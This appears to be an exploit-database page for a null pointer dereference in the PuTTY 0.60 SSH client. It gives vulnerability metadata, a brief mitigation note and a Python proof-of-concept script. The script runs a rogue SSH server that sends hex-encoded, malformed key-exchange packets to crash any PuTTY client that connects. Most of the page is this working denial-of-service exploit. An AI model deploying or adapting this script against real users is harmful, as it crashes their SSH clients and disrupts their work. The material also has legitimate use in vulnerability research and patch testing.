putty 0.60 Null Ptr

vendor:

putty

by:

5.5

CVSS

MEDIUM

Null Pointer Dereference

476

CWE

Product Name: putty

Affected Version From: 0.6

Affected Version To: 0.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

This exploit allows an attacker to crash the putty application by sending specially crafted packets. The vulnerability exists due to improper handling of null pointers in the application. By sending a specific payload, an attacker can trigger a null pointer dereference, leading to a crash.

Mitigation:

Apply the latest patch or update for putty to fix the null pointer dereference vulnerability. Alternatively, use an alternative SSH client until a patch is available.

Source

Exploit-DB raw data:

print "\n" 
print "----------------------------------------------------------------" 
print "| putty 0.60 Null Ptr                                           |" 
print "| Level Smash the Stack                                         |" 
print "----------------------------------------------------------------" 
print "\n"

import sys, socket, binascii
HOST = sys.argv[1]
PORT = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
buf = [
	("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
	("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
	"e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
	"10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
	"362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
	"96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
	"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
	"33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
	"32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
	"d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
	"22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
	"d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
	"d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
	"111001111111111111111111111111111"), ## The 00 controls the crash
	("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
	"64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
	"76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
	"85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
	"000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
	"3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
	"a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
	"f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
	"3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
	"b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
	"75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
	"20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
	"6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
	"ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
	"cac4453d629a47d000000000000000000"),
	("0000000c0a15a1640000c32700008e14")
	]


i = 0
for i in range(0,len(buf)):
    conn.send(binascii.unhexlify(buf[i]))
    i+=1
conn.close()
s.close()